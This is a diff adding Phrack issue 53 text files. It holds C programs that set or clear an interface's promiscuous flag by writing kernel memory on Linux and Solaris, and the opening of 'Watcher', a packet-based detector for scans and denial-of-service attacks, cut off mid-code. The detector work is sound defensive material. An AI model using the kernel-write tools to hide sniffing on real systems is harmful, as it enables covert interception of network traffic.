+ *  usage: promisc [interface 0|1]
+ *
+ *  note:  look at README for notes
+ */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+
+#include <net/if.h>
+#define __KERNEL__
+#include <linux/netdevice.h>
+#undef __KERNEL__
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+#define HEAD_NAME "dev_base"
+#define PATH_KSYMS "/proc/ksyms"
+#define PATH_KMEM "/dev/mem"
+#define IFFBITS \
+"\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \
+"\10NOARP\11PROMISC\12ALLMULTI\13MASTER\14SLAVE\15MULTICAST"
+
+int kread(int fd, u_long addr, void *buf, int len) { 
+  int c;
+
+  if (lseek(fd, (off_t)addr, SEEK_SET) == -1) 
+    return -1;
+  if ((c = read(fd, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+int kwrite(int fd, u_long addr, void *buf, int len) { 
+  int c;
+
+  if (lseek(fd, (off_t)addr, SEEK_SET) == -1) 
+    return -1;
+  if ((c = write(fd, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+void usage(char *s) {
+  printf("usage: %s [interface 0|1]\n", s);
+  exit(1);
+}
+
+main(int argc, char *argv[]) {
+  struct device devn, *devp;
+  char ifname[IFNAMSIZ];
+  int fd, unit, promisc, i, any;
+  char *interface, *cp;
+  FILE *fp;
+  char line[256], symname[256];
+
+  switch (argc) {
+    case 1:
+	promisc = -1;
+	interface = NULL;
+	break;
+    case 3:
+        interface = argv[1];
+        unit = 0;
+        if ((cp = strchr(interface, ':')) != NULL) {
+          *cp++ = 0;
+          unit = strtol(cp, NULL, 10);
+        }
+        promisc = atoi(argv[2]);
+        break;
+    default:
+	usage(argv[0]);
+  }
+
+  if ((fp = fopen(PATH_KSYMS, "r")) == NULL) {
+    perror(PATH_KSYMS);
+    exit(1);
+  }
+
+  devp = NULL;
+  while (fgets(line, sizeof(line), fp) != NULL && 
+                                       sscanf(line, "%x %s", &i, symname) == 2)
+    if (strcmp(symname, HEAD_NAME) == 0) {
+      devp = (struct device *)i;
+      break;
+    }
+  fclose(fp);
+  if (devp ==  NULL) {
+    printf("Cannot find symbol: %s\n", HEAD_NAME);
+    exit(1);
+  }
+
+  if ((fd = open(PATH_KMEM, O_RDWR)) == -1) {
+    perror(PATH_KMEM);
+    exit(1);
+  }
+  if (kread(fd, (u_long)devp, &devp, sizeof(devp)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+
+  for (; devp; devp = devn.next) {
+    if (kread(fd, (u_long)devp, &devn, sizeof(devn)) == -1) {
+      perror("kread");
+      break;
+    }
+    if (kread(fd, (u_long)devn.name, ifname, sizeof(ifname)) == -1) {
+      perror("kread");
+      break;
+    }
+    printf("%s: flags=0x%x ", ifname, devn.flags);
+    cp = IFFBITS;
+    any = 0;
+    putchar('<');
+    while ((i = *cp++) != 0) {
+      if (devn.flags & (1 << (i-1))) {
+	if (any)
+	  putchar(',');
+	any = 1;
+	for (; *cp > 32; )
+	  putchar(*cp++);
+      } else 
+	for (; *cp > 32; cp++)
+	  ;
+    }
+    putchar('>');
+    putchar('\n');
+    /* This sux */
+/*   if (interface && strcmp(interface, ifname) == 0 && unit == ifn.if_unit) {*/
+    if (interface && strcmp(interface, ifname) == 0) {
+      switch (promisc) {
+	case -1: 
+		break;
+        case 0: if ((devn.flags & IFF_PROMISC) == 0)
+		  printf("\tIFF_PROMISC not set\n");
+                else {
+		  printf("\t%s: clearing IFF_PROMISC\n", ifname);
+		  devn.flags &= ~IFF_PROMISC;
+      		  if (kwrite(fd, (u_long)devp, &devn, sizeof(devn)) == -1) 
+                    break;
+                }
+	      break;
+	default: if ((devn.flags & IFF_PROMISC) == IFF_PROMISC)
+		  printf("\tIFF_PROMISC set already\n");
+                else {
+	          printf("\t%s: setting IFF_PROMISC\n", ifname);
+		  devn.flags |= IFF_PROMISC;
+      		  if (kwrite(fd, (u_long)devp, &devn, sizeof(devn)) == -1) 
+                    break;
+                }
+
+      }
+    }
+  }
+}
+<-->
+<++> EX/promisc/socket-p.c
+/*
+ *  This is really dumb program.
+ *  Works on Linux, FreeBSD and Irix.
+ *  Check README for comments.
+ */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc, char *argv[]) {
+  int sd;
+  struct ifreq ifr;
+  char *interface;
+  int promisc;
+
+  if (argc != 3) {
+    printf("usage: %s interface 0|1\n", argv[0]);
+    exit(1);
+  }
+  interface = argv[1];
+  promisc = atoi(argv[2]);
+
+  if ((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
+    perror("socket");
+    exit(1);
+  }
+  strncpy(ifr.ifr_name, interface, IFNAMSIZ);
+  if (ioctl(sd, SIOCGIFFLAGS, &ifr) == -1) {
+    perror("SIOCGIFFLAGS");
+    exit(1);
+  }
+  printf("flags = 0x%x\n", (u_short)ifr.ifr_flags);
+  if (promisc)
+    ifr.ifr_flags |= IFF_PROMISC;
+  else
+    ifr.ifr_flags &= ~IFF_PROMISC;
+  if (ioctl(sd, SIOCSIFFLAGS, &ifr) == -1) {
+    perror("SIOCSIFFLAGS");
+    exit(1);
+  }
+  close(sd);
+}
+<-->
+<++> EX/promisc/solaris-p.c
+/*
+ *  promiscuous flag changer v0.1, apk
+ *  Solaris version, compile with -lkvm -lelf
+ *
+ *  usage: promisc [interface 0|1]
+ *  (interface has "interface[:<alias number>]" format, e.g. le0:1 or le0)
+ * 
+ *  note: look at README for notes because DLPI promiscuous request doesn't
+ *  set IFF_PROMISC this version is kinda useless. 
+ */
+
+#include <sys/types.h>
+#include <sys/time.h>
+
+#include <sys/stream.h>
+#include <sys/socket.h>
+#include <net/if.h>
+
+#define _KERNEL
+#include <inet/common.h>
+#include <inet/led.h>
+#include <inet/ip.h>
+#undef _KERNEL
+
+#include <kvm.h>
+#include <nlist.h>
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+#define IFFBITS \
+"\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \
+"\10NOARP\11PROMISC\12ALLMULTI\13INTELLIGENT\14MULTICAST\15MULTI_BCAST" \
+"\16UNNUMBERED\17PRIVATE"
+
+struct nlist nl[] = {
+	{ "ill_g_head" },
+#define N_ILL_G_HEAD 0
+	{ "" }
+};
+
+int kread(kvm_t *kd, u_long addr, void *buf, int len) {
+  int c;
+
+  if ((c = kvm_read(kd, addr, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+int kwrite(kvm_t *kd, u_long addr, void *buf, int len) {
+  int c;
+
+  if ((c = kvm_write(kd, addr, buf, len)) != len) 
+    return -1;
+  return c;
+}
+
+void usage(char *s) {
+  printf("usage: %s [interface 0|1]\n", s);
+  exit(1);
+}
+
+int main(int argc, char *argv[]) {
+  ill_t illn, *illp;
+  ipif_t ipifn, *ipifp;
+  char ifname[IFNAMSIZ]; /* XXX IFNAMSIZ? */
+  int unit, promisc, i, any;
+  char *interface, *cp;
+  kvm_t *kd;
+
+  switch (argc) {
+    case 1:
+	promisc = -1;
+	interface = NULL;
+	break;
+    case 3:
+    	interface = argv[1];
+        unit = 0;
+    	if ((cp = strchr(interface, ':')) != NULL) {
+          *cp++ = 0;
+          unit = strtol(cp, NULL, 10);
+        }
+	promisc = atoi(argv[2]);
+	break;
+    default:
+	usage(argv[0]);
+  }
+
+  if ((kd = kvm_open(NULL, NULL, NULL, O_RDWR, argv[0])) == NULL) 
+    exit(1);
+
+  if (kvm_nlist(kd, nl) == -1) {
+    perror("kvm_nlist");
+    exit(1);
+  }
+
+  if (nl[N_ILL_G_HEAD].n_type == 0) {
+    printf("Cannot find symbol: %s\n", nl[N_ILL_G_HEAD].n_name);
+    exit(1);
+  }
+
+  if (kread(kd, nl[N_ILL_G_HEAD].n_value, &illp, sizeof(illp)) == -1) {
+    perror("kread");
+    exit(1);
+  }
+
+  for (; illp; illp = illn.ill_next) {
+    if (kread(kd, (u_long)illp, &illn, sizeof(illn)) == -1) {
+      perror("kread");
+      break;
+    }
+    if (kread(kd, (u_long)illn.ill_name, ifname, sizeof(ifname)) == -1) {
+      perror("kread");
+      break;
+    }
+    ipifp = illn.ill_ipif;
+    /* on Solaris you can set different flags for every alias, so we do */
+    for (; ipifp; ipifp = ipifn.ipif_next) {
+      if (kread(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) {
+        perror("kread");
+        break;
+      }
+      printf("%s:%d, flags=0x%x ", ifname, ipifn.ipif_id, ipifn.ipif_flags);
+      cp = IFFBITS;
+      any = 0;
+      putchar('<');
+      while ((i = *cp++) != 0) {
+        if (ipifn.ipif_flags & (1 << (i-1))) {
+          if (any)
+	    putchar(',');
+	  any = 1;
+	  for (; *cp > 32; )
+	    putchar(*cp++);
+        } else 
+  	  for (; *cp > 32; cp++)
+	    ;
+      }
+      putchar('>');
+      putchar('\n');
+      if (interface && strcmp(interface, ifname) == 0 && unit == ipifn.ipif_id){
+        switch (promisc) {
+          case -1: 
+		break;
+          case 0: if ((ipifn.ipif_flags & IFF_PROMISC) == 0)
+		  printf("\tIFF_PROMISC not set\n");
+                else {
+		  printf("\t%s:%d: clearing IFF_PROMISC\n", ifname, unit);
+		  ipifn.ipif_flags &= ~IFF_PROMISC;
+      		  if (kwrite(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) 
+                    perror("kwrite");
+                }
+	      break;
+	  default: if ((ipifn.ipif_flags & IFF_PROMISC) == IFF_PROMISC)
+		  printf("\tIFF_PROMISC set already\n");
+                else {
+	          printf("\t%s:%d: setting IFF_PROMISC\n", ifname, unit);
+		  ipifn.ipif_flags |= IFF_PROMISC;
+      		  if (kwrite(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) 
+                    perror("kwrite");
+                }
+                break;
+        }
+      }
+    }
+  }
+}
+<-->
+
+----[  EOF
+
diff --git a/phrack53/11.txt b/phrack53/11.txt
new file mode 100644
index 0000000..7673674
--- /dev/null
+++ b/phrack53/11.txt
@@ -0,0 +1,1076 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 11 of 15
+
+
+-------------------------[  Watcher
+
+
+--------[  hyperion <hyperion@hacklab.com>
+
+ 
+----[  INTRODUCTION
+
+Do you know if your system has been hacked?  If you found those funny user
+accounts or that Trojaned program, its too late.  You're owned.  Chances are
+that your systems were scanned for holes before your systems were cracked.
+If you had just seen them coming you wouldn't be reloading that OS right now.
+Programs like TCP Wrappers do some good, but they don't see the stealth scans
+or DOS attacks.  You could by a nice commercial network intrusion detector,
+but your wallet screams in agony.  What you need is a low cost (as in free)
+fast, somewhat paranoid network monitor that watches all packets and uses
+few resources.  Watcher provides this.
+
+
+----[  IMPLEMENTATION
+
+Watcher examines all packets on the network interface and assumes they all are
+potentially hostile.  Watcher examines every packet within a 10 second window,
+and, at the end of each window it will record any malicious activity it sees
+using syslog.  Watcher currently detects the following attacks:
+
+    - All TCP scans
+    - All UDP scans
+    - Synflood attacks
+    - Teardrop attacks
+    - Land attacks
+    - Smurf attacks
+    - Ping of death attacks
+
+All parameters and thresholds are configurable through command line options. 
+You can also configure watcher to just look for scans or just look for DOS
+attacks.  Watcher assumes any TCP packet other than a RST (which elicits no
+response) may be used to scan for services.  If packets of any type are
+received by more than 7 different ports within the window, an event is
+logged.  The same criteria are used for UDP scans.  If watcher sees more than
+8 SYN packets to the same port with no ACK's or FIN's associated with the
+SYN's, a synflood event is logged.  If a fragmented UDP packet with an IP id
+of 242 is seen, it is assumed to be a teardrop attack since the published code
+uses an id of 242.  This is somewhat lame since anyone could change the
+attacking code to use other id's.  The code should track all fragmented IP's
+and check for overlapping offsets.  I may do this in a future version.  Any
+TCP SYN packets with source and destination address and ports the same is a
+identified as a land attack.  If more than 5 ICMP ECHO REPLIES are seen within
+the window, Watcher assumes it may be a Smurf attack.  Note that this is not a
+certainty, since someone your watching may just be pinging the hell out of
+someone.  Watcher also assumes that any fragmented ICMP packet is bad, bad,
+bad.  This catches attacks such as the ping of death.
+
+Watcher has three modes of monitoring.  In the default mode, it just watches
+for attacks against its own host.  The second monitoring mode is to watch all
+hosts on it's class C subnet.  In the third mode, it watches all hosts whose
+packets it sees.  Watching multiple hosts is useful if you put Watcher on your
+border to external networks, or to have hosts watch out for each other in case
+one gets cracked before you can react.  Even if log files are destroyed, the
+other host has a record.
+
+It must be noted that since Watcher treats every packet as potentially hostile,
+it sometimes can report false positives.  There are some checks in the code
+to minimize this by increasing its tolerance for certain activity.
+Unfortunately this also increases the rate at which scans can be done before
+Watcher notices.  The usual false positives are TCP scans and synfloods,
+mostly resulting from WWW activity.  Some web pages have many URL's to GIF
+files and other pretty stuff.  Each of these may cause the client to open a
+separate TCP connection to download.  Watcher sees these and treats them as
+a TCP scan of the client.  To minimize this, watcher will only log TCP scans
+if more than 40 are received in the window AND the source port of the scan
+was 80.  This of course can be configured higher or lower as desired.  As for
+synfloods we will use the same WWW example above.  If the client opens a lot
+of connections to the server right before the 10 second window expires and
+Watcher does not see the ACK's or FIN's for those SYN packets, Watcher will
+think the client is synflooding port 80 on the server.  This only happens
+if watcher is watching the server, or if you are watching everyone.  You
+may also get occasional false UDP scans if the system being watched makes
+lots of DNS queries within the window.
+
+The output for Watcher is pretty simple.  Every 10 seconds, any detected
+attacks are logged to syslog.  The source and target IP's are logged along
+with the type of attack.  Where appropriate, other information such as the
+number of packets, or the port involved are logged.  If the attack is normally
+associated with false IP addresses, the MAC address is also logged.  If the
+attack is external, the MAC will be for the local router that handled the
+packet.  If it was from your LAN, you'll have the source machine and you can
+thank the sender in an appropriate manner.
+
+
+----[  PROGRAM EXECUTION
+
+Watcher was written to run on Linux systems.  Watcher has a variety of, most
+of the self-explanatory.  To execute watcher, simply run it in the background,
+usually from the system startup script.  The options are:
+
+Usage: watcher [options] 
+  -d device       Use 'device' as the network interface device
+                  The first non-loopback interface is the default
+  -f flood        Assume a synflood attack occurred if more than
+                  'flood' uncompleted connections are received
+  -h              A little help here
+  -i icmplimit    Assume we may be part of a smurf attack if more
+                  than icmplimit ICMP ECHO REPLIES are seen
+  -m level        Monitor more than just our own host.
+                  A level of 'subnet' watches all addresses in our
+                  subnet and 'all' watches all addresses
+  -p portlimit    Logs a portscan alert if packets are received for
+                  more than portlimit ports in the timeout period.
+  -r reporttype   If reporttype is dos, only Denial Of Service
+                  attacks are reported.  If reporttype is scan
+                  then only scanners are reported.  Everything is
+                  reported by default.
+  -t timeout      Count packets and print potential attacks every
+                  timeout seconds
+  -w webcount     Assume we are being portscanned if more than
+                  webcount packets are received from port 80
+
+Hopefully, watcher will keep your systems a little better protected.  But
+remember that good security is multiple layers, and no single defense tool will
+save you by itself.  If you forget this, you'll be reloading that OS one day.
+
+
+----[  THE CODE
+
+<++> EX/Watcher.c
+/*********************************************************************
+Program: watcher
+
+A network level monitoring tool to detect incoming packets indicative of
+potential attacks.
+
+This software detects low level packet scanners and several DOS attacks.
+Its primary use is to detect low level packet scans, since these are usually
+done first to identify active systems and services to mount further attacks.
+
+The package assumes every incoming packet is potentially hostile.  Some checks
+are done to minimize false positives, but on occasion a site may be falsely
+identified as having performed a packet scan or SYNFLOOD attack.  This usually
+occurs if a large number of connections are done in a brief time right before
+the reporting timeout period (i.e. when browsing a WWW site with lots of
+little GIF's, each requiring a connection to download).  You can also get false
+positives if you scan another site, since the targets responses will be viewed
+as a potential scan of your system.
+
+By default, alerts are printed to SYSLOG every 10 seconds.
+***********************************************************************/
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <sys/file.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <string.h>
+#include <errno.h>
+#include <ctype.h>
+#include <malloc.h>
+#include <netinet/tcp.h>
+#include <netinet/in_systm.h>
+#include <net/if_arp.h>
+#include <net/if.h>
+#include <netinet/udp.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+#include <linux/if_ether.h>
+#include <syslog.h>
+
+#define PKTLEN 96	/* Should be enough for what we want */
+#ifndef IP_MF
+#define IP_MF	0x2000
+#endif
+
+/***** WATCH LEVELS ******/
+
+#define MYSELFONLY	1
+#define MYSUBNET	2
+#define HUMANITARIAN	3
+
+/***** REPORT LEVELS *****/
+
+#define REPORTALL	1
+#define REPORTDOS	2
+#define REPORTSCAN	3
+
+struct floodinfo {
+    u_short sport;
+    struct floodinfo *next;
+};
+
+struct addrlist {
+    u_long saddr;
+    int cnt;
+    int wwwcnt;
+    struct addrlist *next;
+};
+
+struct atk {
+    u_long saddr;
+    u_char eaddr[ETH_ALEN];
+    time_t atktime;
+};
+
+struct pktin {
+    u_long saddr;
+    u_short sport;
+    u_short dport;
+    time_t timein;
+    u_char eaddr[ETH_ALEN];
+    struct floodinfo *fi;
+    struct pktin *next;
+};
+
+struct scaninfo {
+    u_long addr;
+    struct atk teardrop;
+    struct atk land;
+    struct atk icmpfrag;
+    struct pktin *tcpin;
+    struct pktin *udpin;
+    struct scaninfo *next;
+    u_long icmpcnt;
+} ;
+
+struct scaninfo *Gsilist = NULL, *Gsi;
+
+u_long Gmaddr;
+time_t Gtimer = 10, Gtimein;
+int Gportlimit = 7;
+int Gsynflood = 8;
+int Gwebcount = 40;
+int Gicmplimit = 5;
+int Gwatchlevel = MYSELFONLY;
+int Greportlevel = REPORTALL;
+char *Gprogramname, *Gdevice = "eth0";
+
+/******** IP packet info ********/
+
+u_long Gsaddr, Gdaddr;
+int Giplen, Gisfrag, Gid;
+
+/****** Externals *************/
+
+extern int errno;
+extern char *optarg;
+extern int optind, opterr;
+
+void do_tcp(), do_udp(), do_icmp(), print_info(), process_packet();
+void addtcp(), addudp(), clear_pktin(), buildnet();
+void doargs(), usage(), addfloodinfo(), rmfloodinfo();
+struct scaninfo *doicare(), *addtarget();
+char *anetaddr(), *ether_ntoa();
+u_char *readdevice();
+
+main(argc, argv)
+int argc;
+char *argv[];
+{
+    int pktlen = 0, i, netfd;
+    u_char *pkt;
+    char hostname[32];
+    struct hostent *hp;
+    time_t t;
+
+    doargs(argc, argv);
+    openlog("WATCHER", 0, LOG_DAEMON);
+    if(gethostname(hostname, sizeof(hostname)) < 0)
+    {
+	perror("gethostname");
+	exit(-1);
+    }
+    if((hp = gethostbyname(hostname)) == NULL)
+    {
+	fprintf(stderr, "Cannot find own address\n");
+	exit(-1);
+    }
+    memcpy((char *)&Gmaddr, hp->h_addr, hp->h_length);
+    buildnet();
+    if((netfd = initdevice(O_RDWR, 0)) < 0)
+	exit(-1);
+
+    /* Now read packets forever and process them. */
+
+    t = time((time_t *)0);
+    while(pkt = readdevice(netfd, &pktlen))
+    {
+	process_packet(pkt, pktlen);
+	if(time((time_t *)0) - t > Gtimer)
+	{
+	    /* Times up.  Print what we found and clean out old stuff. */
+
+	    for(Gsi = Gsilist, i = 0; Gsi; Gsi = Gsi->next, i++)
+	    {
+                clear_pktin(Gsi);
+	        print_info();
+		Gsi->icmpcnt = 0;
+	    }
+	    t = time((time_t *)0);
+	}
+    }
+}
+
+/**********************************************************************
+Function: doargs
+
+Purpose:  sets values from environment or command line arguments.
+**********************************************************************/
+void doargs(argc, argv)
+int argc;
+char **argv;
+{
+    char c;
+
+    Gprogramname = argv[0];
+    while((c = getopt(argc,argv,"d:f:hi:m:p:r:t:w:")) != EOF)
+    {
+        switch(c)
+        {
+	    case 'd':
+		Gdevice = optarg;
+		break;
+            case 'f':
+                Gsynflood = atoi(optarg);
+                break;
+	    case 'h':
+		usage();
+		exit(0);
+	    case 'i':
+		Gicmplimit = atoi(optarg);
+		break;
+	    case 'm':
+		if(strcmp(optarg, "all") == 0)
+		    Gwatchlevel = HUMANITARIAN;
+		else if(strcmp(optarg, "subnet") == 0)
+		    Gwatchlevel = MYSUBNET;
+		else
+		{
+		    usage();
+		    exit(-1);
+		}
+		break;
+	    case 'p':
+		Gportlimit = atoi(optarg);
+		break;
+	    case 'r':
+		if(strcmp(optarg, "dos") == 0)
+		    Greportlevel = REPORTDOS;
+		else if(strcmp(optarg, "scan") == 0)
+		    Greportlevel = REPORTSCAN;
+		else
+		{
+		    exit(-1);
+		}
+		break;
+	    case 't':
+                Gtimer = atoi(optarg);
+                break;
+	    case 'w':
+		Gwebcount = atoi(optarg);
+		break;
+	    default:
+                usage();
+                exit(-1);
+        }
+    }
+}
+
+/**********************************************************************
+Function: usage
+
+Purpose:  Display the usage of the program
+**********************************************************************/
+void usage()
+{
+printf("Usage: %s [options]\n", Gprogramname);
+printf("  -d device       Use 'device' as the network interface device\n");
+printf("                  The first non-loopback interface is the default\n");
+printf("  -f flood        Assume a synflood attack occurred if more than\n");
+printf("                  'flood' uncompleted connections are received\n");
+printf("  -h              A little help here\n");
+printf("  -i icmplimit    Assume we may be part of a smurf attack if more\n");
+printf("                  than icmplimit ICMP ECHO REPLIES are seen\n");
+printf("  -m level        Monitor more than just our own host.\n");
+printf("                  A level of 'subnet' watches all addresses in our\n");
+printf("                  subnet and 'all' watches all addresses\n");
+printf("  -p portlimit    Logs a portscan alert if packets are received for\n");
+printf("                  more than portlimit ports in the timeout period.\n");
+printf("  -r reporttype   If reporttype is dos, only Denial Of Service\n");
+printf("                  attacks are reported.  If reporttype is scan\n");
+printf("                  then only scanners are reported.  Everything is\n");
+printf("                  reported by default.\n");
+printf("  -t timeout      Count packets and print potential attacks every\n");
+printf("                  timeout seconds\n");
+printf("  -w webcount     Assume we are being portscanned if more than\n");
+printf("                  webcount packets are received from port 80\n");
+}
+
+/**********************************************************************
+Function: buildnet
+
+Purpose:  Setup for monitoring of our host or entire subnet.
+**********************************************************************/
+void buildnet()
+{
+    u_long addr;
+    u_char *p;
+    int i;
+
+    if(Gwatchlevel == MYSELFONLY)		/* Just care about me */
+    {
+	(void) addtarget(Gmaddr);
+    }
+    else if(Gwatchlevel == MYSUBNET)		/* Friends and neighbors */
+    {
+	addr = htonl(Gmaddr);
+	addr = addr & 0xffffff00;
+	for(i = 0; i < 256; i++)
+	    (void) addtarget(ntohl(addr + i));
+    }
+}
+/**********************************************************************
+Function: doicare
+
+Purpose:  See if we monitor this address
+**********************************************************************/
+struct scaninfo *doicare(addr)
+u_long addr;
+{
+    struct scaninfo *si;
+    int i;
+
+    for(si = Gsilist; si; si = si->next)
+    {
+	if(si->addr == addr)
+	    return(si);
+    }
+    if(Gwatchlevel == HUMANITARIAN)	/* Add a new address, we always care */
+    {
+	si = addtarget(addr);
+	return(si);
+    }
+    return(NULL);
+}
+
+/**********************************************************************
+Function: addtarget
+
+Purpose:  Adds a new IP address to the list of hosts to watch.
+**********************************************************************/
+struct scaninfo *addtarget(addr)
+u_long addr;
+{
+    struct scaninfo *si;
+
+    if((si = (struct scaninfo *)malloc(sizeof(struct scaninfo))) == NULL)
+    {
+	perror("malloc scaninfo");
+	exit(-1);
+    }
+    memset(si, 0, sizeof(struct scaninfo));
+    si->addr = addr;
+    si->next = Gsilist;
+    Gsilist = si;
+    return(si);
+}
+
+/**********************************************************************
+Function: process_packet
+
+Purpose:  Process raw packet and figure out what we need to to with it.
+
+Pulls the packet apart and stores key data in global areas for reference
+by other functions.
+**********************************************************************/
+void process_packet(pkt, pktlen)
+u_char *pkt;
+int pktlen;
+{
+    struct ethhdr *ep;
+    struct iphdr *ip;
+    static struct align { struct iphdr ip; char buf[PKTLEN]; } a1;
+    u_short off;
+
+    Gtimein = time((time_t *)0);
+    ep = (struct ethhdr *) pkt;
+    if(ntohs(ep->h_proto) != ETH_P_IP)
+	return;
+
+    pkt += sizeof(struct ethhdr);
+    pktlen -= sizeof(struct ethhdr);
+    memcpy(&a1, pkt, pktlen);
+    ip = &a1.ip;
+    Gsaddr = ip->saddr;
+    Gdaddr = ip->daddr;
+
+    if((Gsi = doicare(Gdaddr)) == NULL)
+	return;
+
+    off = ntohs(ip->frag_off);
+    Gisfrag = (off & IP_MF);	/* Set if packet is fragmented */
+    Giplen = ntohs(ip->tot_len);
+    Gid = ntohs(ip->id);
+    pkt = (u_char *)ip + (ip->ihl << 2);
+    Giplen -= (ip->ihl << 2);
+    switch(ip->protocol)
+    {
+	case IPPROTO_TCP:
+	    do_tcp(ep, pkt);
+	    break;
+	case IPPROTO_UDP:
+	    do_udp(ep, pkt);
+	    break;
+	case IPPROTO_ICMP:
+	    do_icmp(ep, pkt);
+	    break;
+	default:
+	    break;
+    }
+}
+
+/**********************************************************************
+Function: do_tcp
+
+Purpose:  Process this TCP packet if it is important.
+**********************************************************************/
+void do_tcp(ep, pkt)
+struct ethhdr *ep;
+u_char *pkt;
+{
+    struct tcphdr *thdr;
+    u_short sport, dport;
+
+    thdr = (struct tcphdr *) pkt;
+    if(thdr->th_flags & TH_RST) /* RST generates no response */
+	return;			/* Therefore can't be used to scan. */
+    sport = ntohs(thdr->th_sport);
+    dport = ntohs(thdr->th_dport);
+
+    if(thdr->th_flags & TH_SYN)
+    {
+	if(Gsaddr == Gdaddr && sport == dport)
+	{
+	    Gsi->land.atktime = Gtimein;
+	    Gsi->land.saddr = Gsaddr;
+	    memcpy(Gsi->land.eaddr, ep->h_source, ETH_ALEN);
+	}
+    }
+    addtcp(sport, dport, thdr->th_flags, ep->h_source);
+}
+
+/**********************************************************************
+Function: addtcp
+
+Purpose:  Add this TCP packet to our list.
+**********************************************************************/
+void addtcp(sport, dport, flags, eaddr)
+u_short sport;
+u_short dport;
+u_char flags;
+u_char *eaddr;
+{
+    struct pktin *pi, *last, *tpi;
+
+    /* See if this packet relates to other packets already received. */
+
+    for(pi = Gsi->tcpin; pi; pi = pi->next)
+    {
+	if(pi->saddr == Gsaddr && pi->dport == dport)
+	{
+	    if(flags == TH_SYN)
+		addfloodinfo(pi, sport);
+	    else if((flags & TH_FIN) || (flags & TH_ACK))
+		rmfloodinfo(pi, sport);
+	    return;
+	}
+	last = pi;
+    }
+    /* Must be new entry */
+
+    if((tpi = (struct pktin *)malloc(sizeof(struct pktin))) == NULL)
+    {
+	perror("Malloc");
+	exit(-1);
+    }
+    memset(tpi, 0, sizeof(struct pktin));
+    memcpy(tpi->eaddr, eaddr, ETH_ALEN);
+    tpi->saddr = Gsaddr;
+    tpi->sport = sport;
+    tpi->dport = dport;
+    tpi->timein = Gtimein;
+    if(flags == TH_SYN)
+	addfloodinfo(tpi, sport);
+    if(Gsi->tcpin)
+	last->next = tpi;
+    else
+	Gsi->tcpin = tpi;
+}
+
+/**********************************************************************
+Function: addfloodinfo
+
+Purpose:  Add floodinfo information
+**********************************************************************/
+void addfloodinfo(pi, sport)
+struct pktin *pi;
+u_short sport;
+{
+    struct floodinfo *fi;
+
+    fi = (struct floodinfo *)malloc(sizeof(struct floodinfo));
+    if(fi == NULL)
+    {
+        perror("Malloc of floodinfo");
+        exit(-1);
+    }
+    memset(fi, 0, sizeof(struct floodinfo));
+    fi->sport = sport;
+    fi->next = pi->fi;
+    pi->fi = fi;
+}
+
+/**********************************************************************
+Function: rmfloodinfo
+
+Purpose:  Removes floodinfo information
+**********************************************************************/
+void rmfloodinfo(pi, sport)
+struct pktin *pi;
+u_short sport;
+{
+    struct floodinfo *fi, *prev = NULL;
+
+    for(fi = pi->fi; fi; fi = fi->next)
+    {
+	if(fi->sport == sport)
+	    break;
+	prev = fi;
+    }
+    if(fi == NULL)
+	return;
+    if(prev == NULL)	/* First element */
+	pi->fi = fi->next;
+    else
+	prev->next = fi->next;
+    free(fi);
+}
+
+/**********************************************************************
+Function: do_udp
+
+Purpose:  Process this udp packet.
+
+Currently teardrop and all its derivitives put 242 in the IP id field.
+This could obviously be changed.  The truly paranoid might want to flag all
+fragmented UDP packets.  The truly adventurous might enhance the code to
+track fragments and check them for overlaping boundaries.
+**********************************************************************/
+void do_udp(ep, pkt)
+struct ethhdr *ep;
+u_char *pkt;
+{
+    struct udphdr *uhdr;
+    u_short sport, dport;
+
+    uhdr = (struct udphdr *) pkt;
+    if(Gid == 242 && Gisfrag)	/* probable teardrop */
+    {
+	Gsi->teardrop.saddr = Gsaddr;
+	memcpy(Gsi->teardrop.eaddr, ep->h_source, ETH_ALEN);
+	Gsi->teardrop.atktime = Gtimein;
+    }
+    sport = ntohs(uhdr->source);
+    dport = ntohs(uhdr->dest);
+    addudp(sport, dport, ep->h_source);
+}
+
+/**********************************************************************
+Function: addudp
+
+Purpose:  Add this udp packet to our list.
+**********************************************************************/
+void addudp(sport, dport, eaddr)
+u_short sport;
+u_short dport;
+u_char *eaddr;
+{
+    struct pktin *pi, *last, *tpi;
+
+    for(pi = Gsi->udpin; pi; pi = pi->next)
+    {
+	if(pi->saddr == Gsaddr && pi->dport == dport)
+	{
+	    pi->timein = Gtimein;
+	    return;
+	}
+	last = pi;
+    }
+    /* Must be new entry */
+
+    if((tpi = (struct pktin *)malloc(sizeof(struct pktin))) == NULL)
+    {
+	perror("Malloc");
+	exit(-1);
+    }
+    memset(tpi, 0, sizeof(struct pktin));
+    memcpy(tpi->eaddr, eaddr, ETH_ALEN);
+    tpi->saddr = Gsaddr;
+    tpi->sport = sport;
+    tpi->dport = dport;
+    tpi->timein = Gtimein;
+    if(Gsi->udpin)
+	last->next = tpi;
+    else
+	Gsi->udpin = tpi;
+}
+
+/**********************************************************************
+Function: do_icmp
+
+Purpose:  Process an ICMP packet.
+
+We assume there is no valid reason to receive a fragmented ICMP packet.
+**********************************************************************/
+void do_icmp(ep, pkt)
+struct ethhdr *ep;
+u_char *pkt;
+{
